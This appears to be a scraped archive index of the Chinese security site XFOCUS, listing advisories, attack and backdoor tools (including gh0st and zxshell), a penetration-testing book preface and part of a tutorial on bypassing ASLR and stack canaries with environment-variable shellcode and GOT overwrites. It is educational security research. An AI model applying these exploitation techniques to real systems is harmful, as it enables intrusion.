www.archive-net-2013.com » NET » X » XFOCUS

Choose link from "Titles, links and description words view":

Or switch to "Titles and links view".

    Archived pages: 1038 . Archive date: 2013-05.

  • Title: 网络安全焦点::自由的信息安全、黑客攻防和漏洞研究组织
    Original link path: /
    (No additional info available in detailed archive for this subpage)

  • Title: 安全焦点::焦点原创
    Descriptive info: .. 首页.. 焦点原创.. 安全文摘.. 安全工具.. 安全漏洞.. 焦点项目.. 焦点论坛.. 关于我们.. Xcon.. English Version.. 推荐原创.. Foxmail 5远程缓冲区溢出漏洞.. 国内网络安全风险评估市场与技术操作.. X-Scan-v3.. 3-cn.. rar.. One Exploit Play More OS.. 利用MS05-039漏洞传播的蠕虫公告!.. Windows CE API机制初探.. SMB的NTLM认证过程与NTLM挑战的编程实现.. WINDOWS NT/2000 密码到散列的实现算法.. 一种新的File Stream Overflows(FSO).. 标题.. 更新时间.. 作者.. TCCrack.. 2008-01-26.. tombkeeper.. [xfocus-SD-070118]多个操作系统内核不安全方式处理标准IO漏洞.. 2007-01-19.. root.. 安全漏洞杂谈.. 2006-11-23.. watercloud.. 从格式/协议的定义看潜在的漏洞(1).. 2006-10-12.. alert7.. xcmd.. zip.. 2006-09-26.. [xfocus-SD-060329]MPlayer: Multiple integer overflows.. 2006-03-29.. [xfocus-SD-060314]Microsoft Office Excel 缓冲区溢出漏洞.. 2006-03-15.. xsidt-0_1_beta1.. tar.. gz.. 2006-02-16.. 通用弱点评价体系(CVSS)简介.. 2006-02-08.. wlj.. [xfocus-SD-060206]BCB compiler  ...   stardust.. Net-Worm.. Win32.. Dasher(黛蛇)蠕虫公告.. 2005-12-21.. killer.. 从漏洞及攻击分析到NIDS规则设计.. 2005-12-06.. [xfocus-SD-051115] 构造特殊文件名绕过多个反病毒引擎.. 2005-12-05.. [xfocus-SD-051202]openMotif-libUil-Multiple_vulnerability.. 2005-12-02.. getproxy2.. pl.. 2005-11-15.. Sybase数据库评估指南.. 2005-10-19.. 渗透测试操作实务.. 2005-10-16.. Bro NIDS的规则.. 2005-09-28.. Snort 2.. x数据区搜索规则选项的改进.. 2005-09-27.. Bro NIDS的安装与配置.. 2005-09-09.. MS05-018-CSRSS.. c.. 2005-09-05.. eyas.. 反垃圾邮件技术解析.. 2005-08-29.. refdom.. 2005-08-27.. glibc 2.. 3.. 5 的一些新安全特性.. 2005-08-23.. MS05-039Scanner.. 2005-08-22.. 2005-08-16.. 2005-07-18.. 安全焦点历来原创.. 2005年.. 1月.. 2月.. 3月.. 4月.. 5月.. 6月.. 7月.. 8月.. 9月.. 10月.. 11月.. 12月.. 2004年.. 2003年.. 2002年.. Copyright 1998-2006 XFOCUS Team.. All Rights Reserved..

    Original link path: /releases/
    Open archive

  • Title: 安全焦点::安全文摘
    Original link path: /articles/
    (No additional info available in detailed archive for this subpage)
  •  

  • Title: 安全焦点::安全工具
    Descriptive info: 添加工具.. 工具分类.. 扫 描 器.. 攻击程序.. 网络工具.. 后门程序.. 拒绝服务.. 嗅 探 器.. 木 马.. 口令破解.. 代理程序.. 防 火 墙.. 入侵检测.. 完整检查.. 加密解密.. 加密隧道.. 编程相关.. 蠕 虫.. 其它工具.. 工具推荐.. x_invscoutd_aix5l_4x.. ex_foxmail5.. 0_windows.. x_hp-ux11i_nls_ct.. 关键字:.. 所有类别.. 文件名.. 类别.. 所属平台.. 大小.. 提交者.. Yas V1.. 22中文.. 扫 描 器.. Windows.. 207.. 73 K.. 2009-08-07.. sysnap.. hookgina.. dll.. 口令破解.. 44.. 00 K.. nothave.. getdirrw.. exe.. 10.. 50 K.. goldsun.. SysFile_V1.. 1.. 28.. 48 K.. USBVaccine.. 其它工具.. 379.. 86 K.. allyesno.. a8a9.. 完整检查.. 3.. 49 K.. 2008-05-07.. xiaohua.. NtGodMode.. 后门程序.. 9.. tara-3.. 0.. tgz.. Linux.. 481.. 69 K.. sap.. spcark_0.. 3_i386..  ...   53 M.. fzh13.. Safe3URW v1.. 19.. 54 K.. eesoul.. 安全伞V1.. 入侵检测.. 91.. 66 K.. Safe3 Firewall v1.. 20.. 35 K.. sreng2.. 780.. 11 K.. winebibber.. get1_9.. 2.. 95 M.. demonalex.. Skiller.. 攻击程序.. 686.. 33 K.. cnqing.. SessionIE_1022.. 726.. ExplorerSuite.. 49 M.. teamtopkarl.. NTPass.. 42.. 05 K.. SpiderSetup002.. 8.. 02 M.. bonyren.. zxshell3.. 649.. 99 K.. lzx.. aspxspy.. 11.. 83 K.. 54bin.. dhfile.. 94 K.. EvilHsu.. gh0st_src.. 1.. 04 M.. cooldiyer.. nasl_maker.. 213.. 76 K.. FFI.. 加密解密.. 25 M.. 2008-02-14.. DNS-FP.. 网络工具.. 32 M.. 2008-02-02.. 7all.. pangolin_bin.. 48 M.. trace.. 96.. 27 K.. 安全焦点历来工具.. 2006年.. 2001年.. 2000年..

    Original link path: /tools/
    Open archive

  • Title: 安全焦点::安全漏洞
    Descriptive info: 添加漏洞.. 最近严重漏洞.. Microsoft RPC接口远程任意代码可执行漏洞.. Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞.. Microsoft Windows CreateFile API命名管道权限提升漏洞.. 所有危险程度.. 远程管理员权限.. 本地管理员权限.. 普通用户访问权限.. 权限提升.. 读取受限文件.. 远程拒绝服务.. 本地拒绝服务.. 远程非授权文件存取.. 口令恢复.. 欺骗.. 服务器信息泄露.. 隐蔽攻击.. 其它.. 用户敏感信息泄露.. 控制应用程序系统.. 所有错误类型.. 输入验证错误.. 访问验证错误.. 竞争条件.. 意外情况处置错误.. 设计错误.. 配置错误.. 环境错误.. 边界检查错误.. 所有利用方式.. 物理接触.. 服务器模式.. 客户机模式.. 中间人方式.. 所有严重程度.. 高.. 中.. 低.. 整理.. phpwind多个远程代码执行漏洞(phpwind mutiple sql injection vulnerability).. 2010-09-06.. Microsoft Internet Explorer Javaprxy.. DLL COM对象堆溢出漏洞.. 2005-07-02.. suei8423.. Microsoft Browser Client Context Tool 三安全风险.. 2004-12-08.. FreeBSD procfs/linprocfs 进程参数向量处理漏洞.. 2004-12-04.. CMailServer WebMail 多个漏洞.. 2004-11-29.. HP PSC 2510 Printer FTP Service Printer Denial of Service  ...   漏洞.. 2004-11-12.. Microsoft Internet Explorer 拖放操作存在文件安装漏洞.. 2004-08-18.. Samba 3.. x SWAT预验证远程缓冲区溢出漏洞.. 2004-07-22.. xundi.. OpenBSD isakmpd IKE负载处理存在多个安全问题.. 2003-11-07.. Sun Java虚拟机路径处理绕过安全模型漏洞.. 2003-11-06.. BRS WebWeaver httpd `User-Agent`远程拒绝服务漏洞.. 2003-11-04.. NIPrint LPD-LPR Print Server远程缓冲区溢出漏洞.. Oracle9iAS Portal Component SQL注入漏洞.. Web Wiz Forum未授权版面访问漏洞.. Cups Internet Printing Protocol Job循环拒绝服务漏洞.. Bugzilla存在多个漏洞.. CDE LibDTHelp DTHelpUserSearchPath本地缓冲区溢出漏洞.. OpenSSL ASN.. 1超长递归远程拒绝服务漏洞.. Coreutils ls命令宽度超长参数整数溢出漏洞.. 2003-11-03.. Nullsoft SHOUTcast icy-name/icy-url内存破坏漏洞.. Sun Java安装文件破坏漏洞.. 2003-10-31.. Macromedia Flash Player Flash Cookie可预计存储位置漏洞.. 2003-10-30.. BEA Tuxedo/WebLogic Enterprise输入验证漏洞.. Seyeon FlexWATCH Network Video Server未授权管理访问漏洞.. Nokia IPSO存在未明拒绝服务漏洞.. 2003-10-29.. Sun Solaris NFS Server存在未明远程拒绝服务问题.. Oracle File限制内容访问漏洞.. 安全焦点历来整理漏洞.. 1999年.. 1998年.. 1997年..

    Original link path: /vuls/
    Open archive

  • Title: 安全焦点::焦点项目
    Descriptive info: 推荐成果.. Xcon 2005焦点峰会详细资料.. Xcon 2004焦点峰会详细资料.. Xcon 2003焦点峰会详细资料.. Xcon 2002焦点峰会详细资料.. 《网络渗透技术》.. 焦点峰会.. 1、Xcon 2005焦点峰会圆满结束,欢迎下载演讲.. 资料和文档.. 。.. 2、Xcon 2004焦点峰会圆满结束,欢迎下载演讲.. 3、Xcon 2003焦点峰会圆满结束,欢迎下载演讲.. 4、Xcon 2002焦点峰会圆满结束,欢迎下载演讲.. X-Scan.. X-Scan 3.. 焦点书籍.. 已经出版了,点击进入.. 本书详细信息和相关资料.. 分析挑战.. 技术挑战(一) by watercloud.. 陷阱网络.. 学习入侵者团体所使用的工具、方法及目的,并且分享我们的经验。.. 欢迎加入.. honeynet文档翻译.. 企业安全实践.. 企业安全实践( corporation security practise )主要研究、发表企业安全实践过程中经常使用到的管理与技术。主要包括以下内容:.. 1、安全策略( Security Policy ).. 2、安全检查列表( Security Checklist Benchmark ).. 3、安全加固策略( Security Technical Implementation Guide ).. 协议分析.. 协议(包括文件格式)的不安全及对协议的不正确处理是目前安全漏洞经常出现的问题。本项目从工作内容:.. 1、从分析协议(文件格式)入手,对协议进行分析和解码;.. 2、分析协议中的安全问题和程序对协议的不正确处理问题;.. 3、针对已分析和网上已公开的安全威胁,编写程序进行监控和防范。..

    Original link path: /projects/
    Open archive

  • Title: 安全焦点::关于我们
    Descriptive info: 焦点成员.. 公钥.. benjurry.. blackhole.. casper.. flashsky.. funnywei.. quack.. san.. wollf.. 一、这个鬼地方.. 1、定位.. 全方位、非商业而且有自己独特风格的黑客及安全站点。.. 2、目的.. a、整理和发掘网络安全、黑客方面技术文献及工具、代码。.. b、发布我们――包括任何一个对安全有想法的朋友――的想法和发现,为大家提供发布文章及安全、黑客相关工具的园地。.. c、结识更多有共同志向的朋友,共同研究、讨论网络安全的方方面面。.. 3、历史.. 1999年8月,个人主页安全焦点由xundi发起建立。.. 以这个站点为中心,几个对网络安全有一定兴趣的朋友便聚到了一起。聊天、学习,并且把.. 自己的心得体会告诉大家。.. 2000年1月1日,站点改版。风格简单得不能再简单,实用――这是大家都欣赏的。.. 2001年1月1日,站点改版,加入了漏洞利用程序的搜索引擎,整个主页由perl驱动。.. 2001年3月17日,站点改版,由php+mysql驱动。加入论坛、CVS项目、IRC、知识问答等,并把漏洞利用程序搜索引擎替换为在功能定义上更为完善的漏洞数据库。这次改版从形式到内容,都将是一个比较大的飞跃,站点有了很强的可扩展性。与国内同类网站相比,我们希望有更好的文档和工具分类,更深入的归纳整理,更强大的检索功能,成为文档和工具中心可能是我们的发展方向之一。在这些方面应该说我们做了一些不错的工作;而且我们希望在CVS项目上能够带起一个学习、研究系统、网络的风气,更希望这能促进国内的网络安全事业朝更健康的方向发展。.. 4、结构.. a、安全及黑客文献.. 提供安全及黑客相关的文档资料,包括原文,译著和自创文章,数量尽可能多,覆盖面尽可能广。.. 现分为以下几类:.. 黑客教学: 比如samsa的黑客教学文章,invisable evil的黑客教学等一些入门读物。.. 漏洞测试: 比如wuftp260,rpcstatd,bind这类漏洞的分析及exploit的使用。.. 安全配置: 在这可以放上诸如linuxsos-1.. pdf之类的文章.. 专题文章: 与安全相关的技术性专题文章,比如buffer overflow,format bug,lkm之类的文章.. 编程技术: 与安全相关的编程技术文献,比如rpc,tcp/ip编程方面的资料.. 火墙技术: 与防火墙应用相关的文档.. 入侵检测: 被黑后的补课学习 :).. 工具介绍: 各种安全及黑客工具的使用介绍.. 破解专题: Crack!破解与黑客从来就是密不可分的.. b、安全及黑客工具..  ...   入侵检测(ids):如portsentry,watch.. c等.. 完整性检测:如tripwire.. 网络工具:如putty等功能强大的辅助性工具.. 加密解密:如PGP等加解密算法的工具.. c、漏洞引擎.. 对漏洞的种类和形成原因进行分析之后,搜集整理形成的一个数据库,从整体思想上来说,应该比国内同类引擎更加先进,只是数据资料还需要不断地增补录入,才能满足分类、研究的目的。感兴趣的同志可以参见站内文章《计算机网络系统安全漏洞分类研究》,欢迎就此进行探讨。.. d、自由项目.. 希望能够有一些Free的project,我们自身的技术水平得到提高,并去掉一些浮燥的想法和行为,更踏实的做事。.. e、安全论坛.. 论坛家家都有,但做得如何,就需要各显神通了,我们会尽力做的更好。.. 二、这帮兄弟们.. 生活和技术都挺扎实的家伙。.. 自强不息,厚德载物.. 诚实可靠小郎君!.. 相当前卫,不拘小节。.. 好好学习,天天向上。.. 半夜风来叶如火,一塘鹤去心似水.. 其实我是一个演员…….. 乍看是个人渣,细看还不如乍看。.. 文学青年.. 体力劳动者。.. 神呐,救救我吧…….. 生活简单,脑袋也简单。.. 妇科圣手.. 一无是处,杂而无章。.. Wollf Omen Look Lovely Forever.. 老实,诚实.. 一群普普通通的家伙,来自五湖四海,不在同一公司。喜欢自由自在,生活简单,爱玩电脑,偶尔做事会出格;-)有很多梦想,有很多希望……――我们不敢自称黑客,但我们会尽力做到自由与开放。.. 三、以后会怎样.. 网络诡异。.. 或许没人能真正明白网络的力量。短短十几年,网络给整个世界带来了巨大的变化,远在地球两端的人通过网络可以仿佛近如咫尺。网络给无数人带来了商机,但发展的过程中,可能是由于商业化,使网络最初诞生时的信息沟通传递高度自由的想法变得奢侈起来了,真正的黑客也在这时应运而生。.. 黑客是平凡得不能再平凡的人,但他们崇尚自由。.. 为什么中国的黑客几近于无,有的只是浮躁、虚荣、作做……?.. 或许是缺乏环境。Free与Open的环境。.. 我们力量有限,但网络无限,www.. xfocus.. org只希望能提供这样一个环境,对自己、对大家都有帮助。.. 四、一起来玩吧.. 我们想保持队伍的纯洁性。.. 我们想扩大组织的影响力。.. 对于想加入xfocus的安全爱好者来说,我们要求两个字:舍得!.. 要能舍弃一些――钱、精力、经验、技术……都要free.. 才能有得――自豪的感觉、进步、朋友…….. 欢迎加入,xfocus的未来在大家手中。.. 五、还有什么吗.. 少说多做。.. 六、曾经对XFOCUS做出贡献的人员(乱序).. ISNO,LZP,Refdom..

    Original link path: /about/
    Open archive

  • Title: 安全焦点::焦点项目-《网络渗透技术》
    Descriptive info: 焦点项目.. 创建时间:2005-04-21 更新时间:2005-07-28.. 《网络渗透技术》配套资料.. 《网络渗透技术》配套资料打包.. 目前本书可以在如下几个网络书店买到:.. http://www.. phei.. com.. cn/bookshop/bookinfo.. asp?bookcode=TP010350&booktype=main.. huachu.. cn/itbook/itbookinfo.. asp?lbbh=BD05955487.. china-pub.. com/computers/common/info.. asp?id=24504.. 前言.. XFOCUS.. 从狭义上说,网络安全焦点(.. net.. )是一支专业的网络安全技术研究团队;将视野放宽一些,则这是个专注于网络安全技术市场方面交流的小圈子。圈子里是群普普通通的家伙,喜欢自由自在,来自五湖四海,不在同一公司。生活简单,爱玩电脑,偶尔做事会出格…….. 网络诡异。十几年便造就了一个虚拟的世界,但在它带来无数商机的同时,最初的沟通自由的朴素想法却变得奢侈,真正的黑客便随之出现。他们是平凡得不能再平凡的人,但他们崇尚自由,于是便有了一段段听来传奇的故事…….. 但在中国,真正的黑客几近于无,有的只是浮躁、虚荣和做作。或许是环境的问题,我们缺乏Free与Open的环境。力量有限,但网络无限,安全焦点希望以有限的力量提供尽量纯净的技术环境。至于发展,留给变化无穷的网络来诠释吧。.. 网络安全焦点是个开放的圈子,我们用“舍得”的心态来工作生活,先要能舍弃一些――钱、精力、经验、技术……之后才能有――自豪的感觉、进步、朋友…….. 欢迎加入,一起玩吧!.. 关于本书.. 《网络渗透技术》由安全焦点团队中的san,alert7,eyas,watercloud这四位成员共同完成。本书的内容不敢妄称原创,更多的是在前人的研究基础上进一步深入发掘与整理。但是书中的每一个演示实例都经过作者的深思熟虑与实际调试,凝聚了四位作者多年积累的经验。.. 从安全界顶级的杂志和会议看来,中国整体的系统与网络安全技术在世界上并不出色。因为目前中国籍的专家在历届Phrack杂志上只有两篇文章,其中一篇还是在Linenoise里,而在Blackhat和Defcon会议的演讲台上至本书截稿时还未曾出现过中国籍专家。虽然语言问题是其中一个很大的障碍,但我们也不得不正视这个令人沮丧的结果。.. 现在国内市场关于网络安全的书籍数不胜数,但是真正能够直面系统与网络安全底层技术的却又寥寥无几。《网络渗透技术》以尽可能简单的实例深入浅出地揭示了系统与网络安全底层技术,我们不敢奢望每个看过本书的读者能够成为网络安全专家,但我们希望本书能够给后来者一些引导,希望以后在Phrack,Blackhat和Defcon上看到越来越多中国籍专家的身影。.. 内容导读.. 本书共分十个章节,深入浅出地介绍了系统与网络安全底层技术。.. 第1章 基础知识.. 非常感谢安全焦点论坛技术研究版一些朋友的提议,在本书的最开始增加基础知识这个章节。第1章简要地介绍了几种常用调试器和反汇编工具的基本使用方法。对系统与网络安全有一定了解的读者可以跳过这一章。.. 第2章 缓冲区溢出利用技术.. 缓冲区溢出利用技术是本书的重点。本章先介绍了缓冲区溢出的历史,然后一共介绍了六种平台操作系统的利用技术。想要了解各种平台操作系统构架的读者不能错过本章。作者精心设计了几个浅显易懂的实例,并且记录了每一步的调试过程。相信读者看过本章内容以后,对缓冲区溢出的原理和利用技术会有深刻的理解。.. 第3章 Shellcode技术.. 如果没有Shellcode,那么缓冲区溢出一般也只能达到拒绝服务等效果,渗透测试者要想获得控制,必须用Shellcode实现各种功能。比如,得到一个Shell,监听一个端口,添加一个用户。本章不但介绍了各种平台的Shellcode的撰写与提取方法,还深入讨论了各种高级Shellcode技术及相应源码。如远程溢出攻击时搜索套接字Shellcode技术的各种方法,这种技术在远程渗透测试过程中将更加隐蔽。.. 第4章 堆溢出利用技术.. 操作系统对堆的管理比栈复杂多了,而且各种操作系统使用的堆管理算法完全不同。本章介绍了Linux,Windows和Solaris这三种操作系统的堆溢出利用技术,作者为每种操作系统都精心设计了几个浅显易懂的实例来描述各种利用方法。.. 第5章 格式化串漏洞利用技术..  ...   系统漏洞发掘分析.. 相信许多读者会喜欢这一章。在介绍了各种系统漏洞的利用方法以后,本章开始介绍漏洞发掘的一些方法,并且有多个实际漏洞详细分析,也算是前面几章利用技术的实践内容。.. 第9章 CGI渗透测试技术.. 通过系统漏洞获得服务器控制是最直接有效的方法,但是在实际的渗透测试过程中,客户的服务器可能都已经打过补丁了,甚至用防火墙限制只允许Web服务通行。这时最好的渗透途径就是利用CGI程序的漏洞。本章先介绍了跨站脚本和Cookie的安全问题,然后重点介绍PHP的各种渗透测试技巧。.. 第10章 SQL注入利用技术.. 现今的CGI程序一般都使用后台数据库,CGI程序的漏洞又导致了SQL注入的问题。SQL注入利用技术是CGI渗透测试技术的一个重大分支,本章详细介绍了MySQL和SQL Server这两种最常见数据库的注入技术。.. 附录A 系统与网络安全术语中英文对照表.. 本书可能使用到一些系统与网络安全术语,如果读者对术语含义有疑惑的话,请参考附录A。.. 本书源码及相关文档.. 为了节省成本降低书价,《网络渗透技术》书里用到的源码程序和相关参考文档都将放到网络安全焦点网站,以方便读者阅读和使用本书。.. 所有的源码和相关文档按照章节划分目录,在每个章节目录下,读者可以找到相应的演示实例、利用程序的源码,读者可以很方便地进行学习调试。.. 本书用到的源码程序和相关参考文档都将放到网络安全焦点网站,以方便读者阅读和使用本书。.. 所有的源码和相关文档都按照章节划分目录,在每个章节目录下,读者可以找到相应的演示实例、利用程序的源码,读者可以很方便地进行学习调试。.. 对读者的要求.. 本书适合如下的读者:.. ? 对系统与网络安全感兴趣的朋友。本书将引导这些朋友研究更深入的底层安全。.. ? 网络安全从业人员。本书将会是这些朋友很好的参考手册。.. ? 系统与网络程序编写者。所谓知己知彼,百战不殆,在了解了各种安全漏洞的原理后,相信这些朋友写的程序也会更加安全。.. ? 对调试技术感兴趣的读者。.. 希望能和朋友们一起学习、一起提高。.. 使用本书需要具备的知识.. 书到用时方恨少,很多时候知识能够触类旁通。.. ? 汇编基础知识。在漏洞调试过程中,调试器显示的都是汇编代码。在网络安全焦点网站上有多位作者整理搜集的各种平台的汇编指令手册,读者可以在调试过程或写Shellcode的时候做参考。.. ? 熟悉C语言及Perl等脚本语言。本书漏洞演示程序,以及利用程序都用到这些编程语言,并假设读者有基本的编程能力。.. 具备以上知识的读者在阅读本书的时候会更加如鱼得水。.. 致谢.. 特别感谢陈雨小为本书做的整体形象设计。也非常感谢他为安全焦点的logo,Xcon的logo以及形象设计所做的无偿奉献。.. 感谢电子工业出版社对本书的大力支持,感谢责任编辑朱沭红所做的大量工作。.. 感谢绿盟科技宽松的技术氛围,特别是warning3和scz,他们在网上发布过的文章及与他们深入的技术讨论为本书增色不少。.. 感谢0dd邮件列表上的朋友们精彩的技术讨论。.. 最后还要感谢安全焦点团队对本书的支持,没有他们就没有《网络渗透技术》这本书。.. 技术支持.. 读者在阅读本书时有何问题或看法,请到安全焦点论坛的技术研究版与我们交流,我们非常乐意和朋友们一起探讨技术问题,在讨论的同时可以学到更多的知识,交到更多的朋友。.. Copyright 1998-2005 XFOCUS Team..

    Original link path: /projects/book/9.html
    Open archive

  • Title: 安全焦点::安全文摘
    Original link path: /articles/4.html
    (No additional info available in detailed archive for this subpage)

  • Title: 突破ASLR保护和编译器栈保护
    Descriptive info: 添加文章.. 文章分类.. 专题文章.. 漏洞分析.. 安全配置.. 黑客教学.. 编程技术.. 工具介绍.. 火墙技术.. 破解专题.. 焦点公告.. 文章推荐.. 补丁管理最佳安全实践之资产评估.. 协作的信息系统风险评估.. 用Perl POE实现端口重定向.. 突破ASLR保护和编译器栈保护.. 创建时间:2009-08-14.. 文章属性:转载.. 文章来源:hackisle.. cublog.. cn.. 文章提交:.. (t0mbkeeper_at_hotmail.. com).. 作者:hackisle.. ASLR(Address space layout randomization)是一种针对缓冲区溢出的安全保护技术,通过对栈、共享库映射等线性区布局的随机化,防止攻击者定位攻击代码位置,达到阻止溢出攻击的目的。据研究表明ASLR可以有效的降低缓冲区溢出攻击的成功率,如今Linux、FreeBSD、Windows等主流操作系统都已采用了该技术。.. 以下是在Ubuntu7.. 04上对地址空间布局的测试:.. [test.. c].. #include stdlib.. h.. #include unistd.. main().. {.. char *i;.. char buff[20];.. i=malloc(20);.. sleep(1000);.. free(i);.. }.. lk@lk-laptop:~$ ps -aux|grep test.. Warning: bad ps syntax, perhaps a bogus - ? See.. http://procps.. sf.. net/faq.. html.. lk 8731 0.. 0 0.. 0 1632 332 pts/0 S+ 18:49 0:00.. /test.. lk 8766 0.. 0 2884 748 pts/1 R+ 18:49 0:00 grep test.. lk@lk-laptop:~$ cat /proc/8731/maps.. 08048000-08049000 r-xp 00000000 08:01 2256782 /home/lk/Desktop/test.. 08049000-0804a000 rw-p 00000000 08:01 2256782 /home/lk/Desktop/test.. 0804a000-0806b000 rw-p 0804a000 00:00 0 [heap].. b7e60000-b7e61000 rw-p b7e60000 00:00 0.. b7e61000-b7f9c000 r-xp 00000000 08:01 12116 /lib/tls/i686/cmov/libc-2.. 5.. so.. b7f9c000-b7f9d000 r--p 0013b000 08:01 12116 /lib/tls/i686/cmov/libc-2.. b7f9d000-b7f9f000 rw-p 0013c000 08:01 12116 /lib/tls/i686/cmov/libc-2.. b7f9f000-b7fa2000 rw-p b7f9f000 00:00 0.. b7fae000-b7fb0000 rw-p b7fae000 00:00 0.. b7fb0000-b7fc9000 r-xp 00000000 08:01 12195 /lib/ld-2.. b7fc9000-b7fcb000 rw-p 00019000 08:01 12195 /lib/ld-2.. bfe86000-bfe9c000 rw-p bfe86000 00:00 0 [stack].. ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso].. lk 8781 0.. lk 8785 0.. lk@lk-laptop:~$ cat /proc/8781/maps.. b7e1e000-b7e1f000 rw-p b7e1e000 00:00 0.. b7e1f000-b7f5a000 r-xp 00000000 08:01 12116 /lib/tls/i686/cmov/libc-2.. b7f5a000-b7f5b000 r--p 0013b000 08:01 12116 /lib/tls/i686/cmov/libc-2.. b7f5b000-b7f5d000 rw-p 0013c000 08:01 12116 /lib/tls/i686/cmov/libc-2.. b7f5d000-b7f60000 rw-p b7f5d000 00:00 0.. b7f6c000-b7f6e000 rw-p b7f6c000 00:00 0.. b7f6e000-b7f87000 r-xp 00000000 08:01 12195 /lib/ld-2.. b7f87000-b7f89000 rw-p 00019000 08:01 12195 /lib/ld-2.. bfe23000-bfe39000 rw-p bfe23000 00:00 0 [stack].. 通过两次运行后对比/proc下的进程信息可以发现进程栈和共享库映射的地址空间都有了较大的变化,这使得以往通过esp值来猜测shellcode地址的成功率大大降低了。Phrack59期有一篇文章介绍过使用return-into-libc的方法突破ASLR保护,不过存在着较大的条件限制,milw0rm的一篇文章也介绍了通过搜索linux-gate.. 1中的jmp %esp指令从而转向执行shellcode的方法,不过由于现在的编译器将要恢复的esp值保存在栈中,因此也不能继续使用,下面要介绍的是将 shellcode放在环境变量中的通用方法。.. 将shellcode放在环境变量中是比较早期的一种技术,不过在突破ASLR保护时仍能起到很好的效果,要了解其中的原因,首先要分析一下可执行文件的加载过程。Linux系统中提供了execve()系统调用,用来将可执行文件描述的新文境替换原进程的文境,execve()系统调用的内核入口是 sys_execve(),sys_execve()将可执行文件的路径名拷贝到内核空间后调用do_execve(),并将路径名指针、argv数组指针、envp数组指针和pt_regs结构指针传递给它。do_execve()分配一个linux_binprm结构,用可执行文件的数据填充该结构,包括调用copy_strings_kernel()和copy_strings()将可执行文件的路径名、环境变量字串、命令行参数字串拷贝到 linux_binprm结构的page指针数组指向的内核页面中(从后往前拷),然后通过search_binary_handler()搜索并调用可执行文件对应的加载函数,其中elf文件对应的是load_elf_binary()。.. struct linux_binprm{.. char buf[BINPRM_BUF_SIZE];.. struct page *page[MAX_ARG_PAGES];.. struct mm_struct *mm;.. unsigned long p; /* current top of mem */.. int sh_bang;.. struct file * file;.. int e_uid, e_gid;.. kernel_cap_t cap_inheritable, cap_permitted, cap_effective;.. void *security;.. int argc, envc;.. char * filename; /* Name of binary as seen by procps */.. char * interp; /* Name of the binary really executed.. Most.. of the time same as filename, but could be.. different for binfmt_{misc,script} */.. unsigned interp_flags;.. unsigned interp_data;.. unsigned long loader, exec;.. };.. load_elf_binary()的主要流程是把page指针数组指向的内核页面映射回用户空间,接着将可执行文件和解释器的部分区段映射到用户空间,并设置用户空间栈上的argc,argv[],envp[]和解释器将用到的辅助向量。为了将page指针数组指向的页面映射到用户空间,load_elf_binary()中调用了setup_arg_pages(),对应代码如下:.. retval = setup_arg_pages(bprm, randomize_stack_top(STACK_TOP), executable_stack);.. 其中,STACK_TOP的值通常等于0xc0000000,即用户空间的顶端,randomize_stack_top()首先判断内核是否开启了 ASLR保护,如果开启,则调用get_random_int()获得一个随机数,并和STACK_RND_MASK(0x7ff)相与后再左移 PAGE_SHIFT(12)位得到random_variable,最后将stack_top按页边界对齐后减去random_variable,得到最终的stack_top值,由此我们可以算出stack_top可能的最小值为0xc0000000-0x7ff000=0xbf801000。.. static unsigned long randomize_stack_top(unsigned long stack_top).. unsigned int random_variable = 0;.. if ((current- flags PF_RANDOMIZE).. !(current- personality ADDR_NO_RANDOMIZE)) {.. random_variable = get_random_int() STACK_RND_MASK;.. random_variable = PAGE_SHIFT;.. #ifdef CONFIG_STACK_GROWSUP.. return PAGE_ALIGN(stack_top) + random_variable;.. #else.. return PAGE_ALIGN(stack_top) - random_variable;.. #endif.. stack_base的值是按以下代码确定的:.. stack_base = arch_align_stack(stack_top  ...   其中vul.. c是漏洞程序,shellcode的功能是执行run程序,run程序在当前目录下建立一个test文件,并结束exp进程。将页面大小 4096减去NULL指针的长度4,再减去路径名 vul 的长度4和scd数组的长度43,再加上开头4个字符的长度,最后便可得到shellcode 在页面内的偏移值fd1,同时开启20个进程分别以0xbfa81fd1等不同地址进行尝试,很快目录下便出现test文件,证明我们的 shellcode如期执行了。.. 为了防止栈溢出攻击,高版本的gcc通常会在编译时为局部变量含有char数组的函数中加入保护代码,通过:.. 0x08048481 main+29 : mov %gs:0x14,%eax.. 0x08048487 main+35 : mov %eax,0xfffffff8(%ebp).. 把一个canary word保存在栈中,在函数返回时再通过:.. 0x080484dd main+121 : mov 0xfffffff8(%ebp),%edx.. 0x080484e0 main+124 : xor %gs:0x14,%edx.. 0x080484e7 main+131 : je 0x80484ee main+138.. 0x080484e9 main+133 : call 0x80483a8 __stack_chk_fail@plt.. 检查该值是否被覆盖,从而判断是否发生栈溢出并转向相应的处理流程。另外,gcc还会调整局部变量的位置,把char数组挪到较高处,防止溢出时覆盖其它重要变量。这些措施在一定程度上增加了溢出攻击攻击的难度,但在某些特定情况下也可能被绕过,比如:.. #include fcntl.. #include sys/stat.. int fd;.. fd=open( /dev/null ,O_RDWR);.. dup2(fd,1);.. printf(buff);.. 当存在可写任意内存地址漏洞时(某些栈溢出漏洞也可能导致写任意内存地址,为了演示方便,使用了format string漏洞),可以通过修改__stack_chk_fail对应的GOT项从而改变程序的执行流程。.. lk@lk-laptop:~/Desktop$ gdb vul -q.. Using host libthread_db library /lib/tls/i686/cmov/libthread_db.. 1.. (gdb) disas main.. Dump of assembler code for function main:.. 0x080484a4 main+0 : lea 0x4(%esp),%ecx- ecx等于esp+4.. 0x080484a8 main+4 : and $0xfffffff0,%esp.. 0x080484ab main+7 : pushl 0xfffffffc(%ecx).. 0x080484ae main+10 : push %ebp.. 0x080484af main+11 : mov %esp,%ebp.. 0x080484b1 main+13 : push %ecx- 把ecx的值保存在栈中.. 0x080484b2 main+14 : sub $0xe4,%esp- 这时的esp等于ebp-232.. 0x080484b8 main+20 : mov 0x4(%ecx),%eax.. 0x080484bb main+23 : mov %eax,0xffffff28(%ebp)- 把argv指针数组的指针保存在ebp-216处.. 0x080484c1 main+29 : mov %gs:0x14,%eax.. 0x080484c7 main+35 : mov %eax,0xfffffff8(%ebp)- 把canary word保存在ebp-8处.. 0x080484ca main+38 : xor %eax,%eax.. 0x080484cc main+40 : movl $0x804862c,(%esp).. 0x080484d3 main+47 : call 0x8048398 getenv@plt.. 0x080484d8 main+52 : mov %eax,0x4(%esp).. 0x080484dc main+56 : movl $0x8048630,(%esp).. 0x080484e3 main+63 : call 0x80483d8 printf@plt.. 0x080484e8 main+68 : mov 0xffffff28(%ebp),%eax.. 0x080484ee main+74 : add $0x4,%eax.. 0x080484f1 main+77 : mov 